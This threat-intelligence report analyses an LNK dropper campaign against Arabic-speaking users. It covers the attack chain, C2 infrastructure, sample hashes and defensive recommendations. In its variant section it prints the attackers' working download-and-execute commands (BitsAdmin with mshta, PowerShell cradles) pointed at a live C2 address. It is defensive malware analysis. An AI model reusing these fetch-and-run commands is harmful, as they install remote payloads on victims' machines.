criticalAPT

Operation MIRZBOW — LNK Dropper Campaign Targeting Arabic-Speaking Users

InvestigatedApril 3, 2026PublishedApril 3, 2026

Threat Actors:ProfileAssessments including:groups operating in the Syrian theater.

amzzipsyriac2rattorlnk

TLP: WHITE Date: 2026-04-03 Analyst: GHOST (Breakglass Intelligence) Classification: Cybercrime / Targeted Espionage (Dual-Use) Source Lead: @smica83 via Twitter/MalwareBazaar

Executive Summary

A multi-variant LNK-based malware dropper campaign has been identified operating from a single C2 server at 46[.]161[.]0[.]94, hosted on Russian bulletproof infrastructure managed by MNT-PINSUPPORT (Metluk Nikolay Valeryevich, St. Petersburg). The campaign uses at least four distinct payload delivery paths and targets Arabic-speaking users — confirmed by a LNK file named "نموذج.xls.lnk" (Arabic for "Form/Template") — alongside English-language lures. Ten related samples have been identified communicating with this C2, employing BitsAdmin, PowerShell, and obfuscated command-line techniques to download and execute second-stage payloads including HTA files, PowerShell scripts, and a trojanized Chrome executable. The campaign has been active since at least November 2025, with the most recent sample (amz.zip) uploaded on April 2, 2026. All second-stage payload URLs now return HTTP 403, indicating the operator is aware of exposure and has locked down the infrastructure.

Key Findings

10 malware samples identified communicating with the single C2 IP 46[.]161[.]0[.]94
Arabic-language targeting confirmed via "نموذج.xls.lnk" (Form/Template) filename
4 distinct C2 payload paths: /Mirzbow/, /mirmLAT/, /smersh/, /course/ — plus /chromeupd.zip
Multi-stage attack chain: LNK -> BitsAdmin/PowerShell -> HTA/PS1 -> trojanized chrome.exe + decoy document
Russian BPH infrastructure: AS63023 (GTHost/GlobalTeleHost), managed by MNT-PINSUPPORT (St. Petersburg, Russia)
Extensive obfuscation: Caret escaping, string splitting with single quotes, wildcard command resolution, delayed variable expansion
Anti-analysis features: IsDebuggerPresent, GetTickCount, Sleep timers, debug environment detection
Campaign duration: At least November 2, 2025 through April 2, 2026 (5+ months active)
ReversingLabs classification: Win32.Trojan.Sonbokli — linked to SilverFox and DonutLoader families

Attack Chain

[Delivery]                    [Stage 1]                      [Stage 2]                    [Stage 3]
 Email/IM                      LNK File                       Downloader                   Payload
 ┌─────────┐    Open ZIP    ┌──────────────┐   cmd.exe     ┌─────────────┐  Download   ┌──────────────┐
 │ amz.zip  │──────────────>│ summ.xlsx.lnk│─────���────────>│ BitsAdmin /  │────────────>│ chrome.exe   │
 │ pdf.zip  │               │ نموذج.xls.lnk│               │ PowerShell   │             │ (trojanized) │
 │ Amz-1.zip│               │ PointOne.rtf │               │ (obfuscated) │             │ + decoy .xls │
 └──��──────┘                └──────────────┘               └─────────────┘             └──────────────┘
                                 │                              │
                                 │ Icon: Excel/RTF              │ Custom UA: "UA WindowsPowerShell"
                                 │ Window: ShowMinNoActive      │ Paths: /Mirzbow/ /mirmLAT/ /smersh/
                                 │ WD: %LOCALAPPDATA%           │

Variant Analysis — Three Delivery Mechanisms

Variant A (BitsAdmin + HTA): Used in amz.zip / summ.xlsx.lnk

cmd.exe /v:on /c set mycmd=bitsadmin /transfer DdZEm5rrf3QWF09 /download
  http://46.161.0.94/Mirzbow/artifactperformance.hta %TEMP%\XSJwreBnNCprgVixrzWUXQBu.hta
  && mshta.exe %TEMP%\XSJwreBnNCprgVixrzWUXQBu.hta && cmd /c !mycmd!

Uses delayed expansion (/v:on) for evasion
Caret escaping on every character (b^i^t^s^a^d^m^i^n)
Random BitsAdmin job name and temp filename

Variant B (PowerShell + WinHTTP): Used in summary.xlsx.lnk

powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1';
  $r.Open('GET', 'http://46.161.0.94/mirmLAT/departuredishwasher.ps1', $false);
  $r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell');
  $r.Send(); . ([ScriptBlock]::Create($r.ResponseText))

Hidden window (-w Hidden)
Custom User-Agent: UA WindowsPowerShell
Downloads PS1 and executes via ScriptBlock

Variant C (PowerShell + Multi-Stage + Decoy): Used in نموذج.xls.lnk (Arabic lure)

powershell.exe -win 1 [junk echo commands]; sleep 0.03;
  if (-not(Test-Path 'chromeupd.zi''p''')){
    Invoke-WebRequest -uri htt''p://46''.16''1.0''.94/chromeupd''.zi''p -OutFile chromeupd.zip
  };
  Expand-Archive -Path chromeupd.zip -DestinationPath ps_x32;
  start ps_x32/chrome.exe;
  Invoke-WebRequest -uri htt''p://46''.16''1.0''.94/course/unarchive_attempt_failure.xls
    -OutFile unarchive_attempt_failure.xls;
  start unarchive_attempt_failure.xls

Junk ECHo commands for obfuscation padding
String splitting with single quotes (htt''p://, chromeupd''.zi''p)
Wildcard command resolution (inv??e-webr**** = Invoke-WebRequest)
Downloads trojanized chrome.exe AND a decoy Excel document
Decoy document (unarchive_attempt_failure.xls) opened to maintain social engineering cover

Variant D (PowerShell + ScriptBlock + Hidden): Used in PointOne.rtf.lnk

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient |
  ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell');
  $_.DownloadString('http://46.161.0.94/smersh/stealinvestigator.ps1') })))

Same custom UA as Variant B
Downloads and executes PS1 from /smersh/ path

Infrastructure Analysis

C2 Server

Attribute	Value
IP Address	46[.]161[.]0[.]94
Hostname	vm12430.hyper.hosting
ASN	AS63023 (GTHost / GlobalTeleHost)
ASN Registrant	GTHost, 427 S La Salle St Suite 405, Chicago IL
RIPE Maintainer	MNT-PINSUPPORT
RIPE Admin	Varnyan Valeriya Viktorovna, Moscow, RU
RIPE Maintainer Admin	Metluk Nikolay Valeryevich, St. Petersburg, RU
Network	46[.]161[.]0[.]0/24 (cust88530-network)
Country (RIPE)	FR (registration), RU (operator)
Services	SSH (OpenSSH 8.9p1), HTTP (Apache 2.4.52 Ubuntu)
Status	LIVE (403 on all paths — locked down but responsive)
VT Detection	11 malicious, 2 suspicious out of 93 vendors

C2 URL Paths (Observed)

Path	Payload Type	Associated LNK Variant	First Observed
/Mirzbow/artifactperformance.hta	HTA	summ.xlsx.lnk (amz.zip)	2026-03-30
/mirmLAT/departuredishwasher.ps1	PowerShell	summary.xlsx.lnk	2026-03-17
/smersh/stealinvestigator.ps1	PowerShell	PointOne.rtf.lnk	2025-11-02
/smersh/puzzledsymbol.ps1	PowerShell	summary.xlsx.lnk	Unknown
/chromeupd.zip	Trojanized Chrome	نموذج.xls.lnk	Unknown
/course/unarchive_attempt_failure.xls	Decoy document	نموذج.xls.lnk	Unknown

Naming pattern analysis: Path names appear randomly generated (Mirzbow, mirmLAT, smersh) with two-word payload filenames (artifactperformance, departuredishwasher, stealinvestigator, puzzledsymbol). The word smersh is notable — it references the Soviet/Russian military counterintelligence organization SMERSH (Smert Shpionam / "Death to Spies"), potentially a deliberate cultural reference by the operator.

Adjacent Infrastructure

IP	Hostname	Ports	Notes
46[.]161[.]0[.]80	vm15617.hyper.hosting	22,80,443,3003,8443	Hosts trade-ooooptima[.]com, assetregenltd[.]com
46[.]161[.]0[.]88	vm13585.hyper.hosting	1701	L2TP VPN
46[.]161[.]0[.]94	vm12430.hyper.hosting	22,80	C2 server
46[.]161[.]0[.]96	vm13805.hyper.hosting	161,1701	SNMP + L2TP VPN

Note on 46[.]161[.]0[.]80: Hosts assetregenltd[.]com (registered 2026-03-25 via OpenProvider/Registrar.eu, Cloudflare NS: hadlee/nolan) and trade-ooooptima[.]com. Both are suspicious — assetregenltd.com was registered 8 days ago, same hosting block as the C2. May be related campaign infrastructure for financial fraud/social engineering, but no direct malware link confirmed.

Hosting Hierarchy

AS63023 (GTHost/GlobalTeleHost, Chicago IL)
  └── hyper.hosting (reseller brand)
      └── MNT-PINSUPPORT (RIPE maintainer, St. Petersburg RU)
          └── cust88530-network (46.161.0.0/24)
              └── vm12430 = 46.161.0.94 (C2 SERVER)

MNT-PINSUPPORT manages at minimum 20+ /24 blocks across:

146[.]185[.]212[.]0/24 through 146[.]185[.]253[.]0/24 (multiple ranges)
185[.]232[.]28[.]0/22 (DE-PINHOSTING, Estonia)
188[.]143[.]160[.]0 - 188[.]143[.]231[.]0 (large block, Russia)
46[.]161[.]0[.]0/24 (this C2)

This is a large-scale Russian bulletproof hosting operation with infrastructure registered across RU, DE, EE, ES, NL, and FR.

Malware Analysis

Sample Inventory

SHA256	Filename	Type	Detection	Threat Label
3c5ca1d037d3d3ac89fb1415a4b374e4ead9f36c466b7917fa4f009e0a834b5f	amz.zip	ZIP	27/66	trojan.leopard/hiddenext
ce01596c7e57752e28c9c6ed1102afde6b5ea9e1084e5d79fd3cdd2afdda819e	summ.xlsx.lnk	LNK	(inner)	BitsAdmin dropper
19908832f56b96678064ce686c8982e4c46c9a3ef4b489b114843087eec97daa	Amz-1.zip	ZIP	31/60	trojan.boxter/downlnk
19cb78e1c8d0552e2379e61931b4da51a2a614838df30699ea9c6f16b5182985	summ.xlsx.lnk	LNK	28/59	trojan.boxter/downlnk
25db9e8f7fa51bd00434cd0ed5ada9981d0fadc4147b56719c45206ea2568c2a	pdf.zip	ZIP	31/65	trojan.boxter/downlnk
35847fecdf896819cb21b6434856f823ab438ad46d9a5ef502053edf45900b06	PointOne.rtf.lnk	LNK	23/58	trojan.boxter/downlnk
8d67ee22dd5b1ad0ba524b46691f988240785c67a6ba3901c41945823f6c1c87	summary.xlsx.lnk	LNK	34/62	trojan.boxter/downlnk
9befd3e28656fe5572214288217f4399926884b19d9245028ca588501c79f1d2	(unnamed zip)	ZIP	32/67	trojan.boxter/lnkexec
a478c80c64f1c824d8851745a8ad0ed94b0ad3fdb7ec2bf36205feb63aa803f2	PointOne.rtf.lnk	LNK	35/63	trojan.boxter/downlnk
abaa25a2a7a04c7dd4c33e6afde44f618112603f91550128295bb11e8d7eb5c9	summary.xlsx.lnk	LNK	29/63	trojan.boxter/downlnk
adf20c2868817140956045bc75a348a2170d2ecf58ef83758e2ca5688581e0b4	نموذج.xls.lnk	LNK	27/63	trojan.boxter/lnkexec

LNK Metadata (summ.xlsx.lnk from amz.zip)

Field	Value
SHA256	ce01596c7e57752e28c9c6ed1102afde6b5ea9e1084e5d79fd3cdd2afdda819e
File Size	7,086 bytes
Creation Time	2026-03-30 13:26:05 UTC
Icon	SHELL32.dll, index 250 (Excel icon)
Target	C:\Windows\System32\cmd.exe
Working Directory	%LOCALAPPDATA%
Window Style	ShowMinNoActive (hidden execution)
Description	"MS Excel Worksheet"
Root Folder CLSID	20D04FE0-3AEA-1069-A2D8-08002B30309D (My Computer)

Sonbokli Family Context

ReversingLabs classifies this campaign as Win32.Trojan.Sonbokli. On MalwareBazaar, samples tagged "Sonbokli" are also tagged with:

SilverFox — Chinese-origin infostealer/RAT associated with trojanized software
DonutLoader — Shellcode generation framework for in-memory PE/DLL/CLR loading

This suggests the final payload (chrome.exe from chromeupd.zip) may be a SilverFox variant packed with DonutLoader, though the second-stage payloads could not be retrieved for confirmation as the C2 now returns 403 on all paths.

Behavioral Indicators (from VT sandbox)

Indicator	Detail
Anti-Debug	IsDebuggerPresent, GetTickCount timing checks
Sleep Evasion	Detect-debug-environment, long-sleeps
Process Injection	WriteProcessMemory (Triage signature)
Location Check	Checks computer location settings
Storage Enum	Enumerates physical storage devices
Custom UA	"UA WindowsPowerShell"

Threat Actor Profile

Attribution Assessment

Confidence: MEDIUM
Country/Region: Russia (infrastructure and cultural indicators)
Motivation: Likely dual-use — espionage targeting Arabic-speaking populations + general cybercrime
Sophistication: Moderate — multiple obfuscation variants, custom tooling, but relies on known TTPs

Evidence for Russian Attribution

RIPE maintainer: MNT-PINSUPPORT, admin Metluk Nikolay Valeryevich, St. Petersburg
RIPE admin contact: Varnyan Valeriya Viktorovna, Moscow
ASN: GTHost (AS63023) — known to resell to Russian operators
C2 path name: /smersh/ — SMERSH was Soviet military counterintelligence ("Death to Spies")
Hosting pattern: Uses hyper.hosting brand under Russian-managed infrastructure
Sonbokli/SilverFox family links: Associated with operations targeting Chinese and Middle Eastern users

OPSEC Observations

Uses direct IP (no domain) for C2 — avoids DNS-based detection but limits operational flexibility
Multiple delivery variants suggest active development and A/B testing of evasion techniques
Locks down C2 paths (403) after sample exposure — monitors public sandboxes and threat intel feeds
Campaign duration of 5+ months on same IP suggests confidence in BPH protection from takedown

Targeting Analysis

Confirmed Target: Arabic-Speaking Users

The LNK file نموذج.xls.lnk uses Arabic text ("Form" or "Template") as the filename, indicating:

Primary targeting: Arabic-speaking populations, likely in Syria (per @smica83's tweet context)
Social engineering theme: Government/organizational forms — common in targeted campaigns against activists, journalists, and opposition groups in conflict zones
Decoy document: /course/unarchive_attempt_failure.xls — suggests education/training themed lure

Secondary Targets

English-language lures (summary.xlsx.lnk, PointOne.rtf.lnk, pdf.zip) suggest broader targeting
amz.zip / Amz-1.zip — possible Amazon-themed lure for financial/credential phishing

Regional Context

Syria has been a persistent target for state-sponsored and state-adjacent cyber operations. Arabic-named LNK files disguised as government forms are a well-documented TTP used by multiple actors including:

Syrian Electronic Army
APT-C-37 (Pat-Bear)
Various Russian-aligned operations supporting the Assad regime
Iranian-aligned groups

The use of Russian BPH infrastructure combined with Arabic-language targeting is consistent with Russian intelligence operations or Russian-speaking mercenary/contractor groups operating in the Syrian theater.

MITRE ATT&CK Mapping

Tactic	Technique	ID	Application
Initial Access	Phishing: Spearphishing Attachment	T1566.001	ZIP file containing malicious LNK
Execution	Command and Scripting Interpreter: Windows Command Shell	T1059.003	cmd.exe with obfuscated commands
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	Hidden PowerShell download cradle
Execution	System Services: MSHTA	T1218.005	mshta.exe executing downloaded HTA
Execution	User Execution: Malicious File	T1204.002	User opens LNK disguised as document
Persistence	BITS Jobs	T1197	BitsAdmin for payload download
Defense Evasion	Obfuscated Files or Information	T1027	Caret escaping, string splitting, wildcard commands
Defense Evasion	Masquerading: Match Legitimate Name	T1036.005	LNK uses Excel/RTF icons, chrome.exe name
Defense Evasion	Deobfuscate/Decode Files	T1140	Runtime string reconstruction
Defense Evasion	Virtualization/Sandbox Evasion	T1497	Debug detection, timing checks, long sleeps
Command and Control	Application Layer Protocol: Web	T1071.001	HTTP GET to direct IP for payload download
Command and Control	Ingress Tool Transfer	T1105	BitsAdmin/PowerShell downloading payloads

IOC Summary

Network Indicators

C2 Server:

46[.]161[.]0[.]94 (LIVE — returns 403)

C2 URLs (all hxxp://):

hxxp://46[.]161[.]0[.]94/Mirzbow/artifactperformance.hta
hxxp://46[.]161[.]0[.]94/mirmLAT/departuredishwasher.ps1
hxxp://46[.]161[.]0[.]94/smersh/stealinvestigator.ps1
hxxp://46[.]161[.]0[.]94/smersh/puzzledsymbol.ps1
hxxp://46[.]161[.]0[.]94/chromeupd.zip
hxxp://46[.]161[.]0[.]94/course/unarchive_attempt_failure.xls

Adjacent Suspicious Infrastructure:

46[.]161[.]0[.]80 (trade-ooooptima[.]com, assetregenltd[.]com)

File Indicators

Hash (SHA256)	Filename
3c5ca1d037d3d3ac89fb1415a4b374e4ead9f36c466b7917fa4f009e0a834b5f	amz.zip
ce01596c7e57752e28c9c6ed1102afde6b5ea9e1084e5d79fd3cdd2afdda819e	summ.xlsx.lnk
19908832f56b96678064ce686c8982e4c46c9a3ef4b489b114843087eec97daa	Amz-1.zip
19cb78e1c8d0552e2379e61931b4da51a2a614838df30699ea9c6f16b5182985	summ.xlsx.lnk
25db9e8f7fa51bd00434cd0ed5ada9981d0fadc4147b56719c45206ea2568c2a	pdf.zip
35847fecdf896819cb21b6434856f823ab438ad46d9a5ef502053edf45900b06	PointOne.rtf.lnk
8d67ee22dd5b1ad0ba524b46691f988240785c67a6ba3901c41945823f6c1c87	summary.xlsx.lnk
9befd3e28656fe5572214288217f4399926884b19d9245028ca588501c79f1d2	(unnamed).zip
a478c80c64f1c824d8851745a8ad0ed94b0ad3fdb7ec2bf36205feb63aa803f2	PointOne.rtf.lnk
abaa25a2a7a04c7dd4c33e6afde44f618112603f91550128295bb11e8d7eb5c9	summary.xlsx.lnk
adf20c2868817140956045bc75a348a2170d2ecf58ef83758e2ca5688581e0b4	نموذج.xls.lnk

MD5 (amz.zip): b5ea8c6b6fc0294adfb1084149d98933 SHA1 (amz.zip): 66a9e431a2a6b388800b946d2677686241f84132 SSDEEP (amz.zip): 24:9kZKk/9nlzgm+G0/gTlF0gJFof1GRziuEbnWwmLey6:9CKEhlMVTYrHFof1vuEawmE TLSH (amz.zip): T1E1E1C05033BE9200F2B6C675CD75B764CF4AFD009A7696C80AB2225C9C31B649D21B29

Behavioral Indicators

Type	Value
BitsAdmin Job Name	DdZEm5rrf3QWF09
Temp File	%TEMP%\XSJwreBnNCprgVixrzWUXQBu.hta
Extraction Path	ps_x32\chrome.exe
User-Agent	UA WindowsPowerShell
LNK Description	"MS Excel Worksheet"

Vendor Intelligence Summary

Vendor	Verdict	Details
ReversingLabs	MALICIOUS	Win32.Trojan.Sonbokli (7/36 engines)
YOROI YOMI	Malicious File	Score: 1.00
InQuest	MALICIOUS	IPv4 Dotted Quad URL detected
DocGuard	Malicious	LNK File — extracted C2 URL
Triage	Dropper (8/10)	BitsAdmin download, obfuscated cmd, WriteProcessMemory
FileScan-IO	MALICIOUS	Threat level 1.0, confidence 1.0
Spamhaus HBL	Suspicious	—
ClamAV	Multiple hits	EvilLNK family (7 signatures)

Recommended Actions

Immediate (24-48 hours)

Block 46[.]161[.]0[.]94 at firewall/proxy (all ports)
Hunt for BitsAdmin transfers with randomized job names targeting port 80 direct IPs
Search for "UA WindowsPowerShell" User-Agent in proxy logs
Alert on PowerShell executions with -w Hidden and WinHttp.WinHttpRequest.5.1
Search email gateway logs for ZIP attachments containing .lnk files with Excel/RTF icons

Short-term (1-2 weeks)

Block entire 46[.]161[.]0[.]0/24 range (BPH infrastructure)
Deploy YARA rules below to email gateway and endpoint
Deploy Suricata rules below to network sensors
Monitor MNT-PINSUPPORT ranges (146.185.x.x, 185.232.28-31.x, 188.143.x.x) for new C2 deployments
Share IOCs with regional CERTs — particularly SY-CERT if exists, and organizations operating in Syrian conflict zone

Medium-term (1-3 months)

Monitor for new samples communicating with 46[.]161[.]0[.]0/24
Track Sonbokli/Boxter family evolution on MalwareBazaar
Monitor assetregenltd[.]com and trade-ooooptima[.]com for activation

References

MalwareBazaar sample: https://bazaar.abuse.ch/sample/3c5ca1d037d3d3ac89fb1415a4b374e4ead9f36c466b7917fa4f009e0a834b5f/
CERT-PL MWDB: https://mwdb.cert.pl/sample/3c5ca1d037d3d3ac89fb1415a4b374e4ead9f36c466b7917fa4f009e0a834b5f/
Triage sandbox: https://tria.ge/reports/260402-pqrxladv6y/
InQuest DFI: https://labs.inquest.net/dfi/sha256/3c5ca1d037d3d3ac89fb1415a4b374e4ead9f36c466b7917fa4f009e0a834b5f
FileScan-IO: https://www.filescan.io/uploads/69ce5bf5972c219c8d760c21/reports/d83ff896-2729-48eb-85cf-d2fa2c74e399/overview
@smica83 original report via Twitter/MalwareBazaar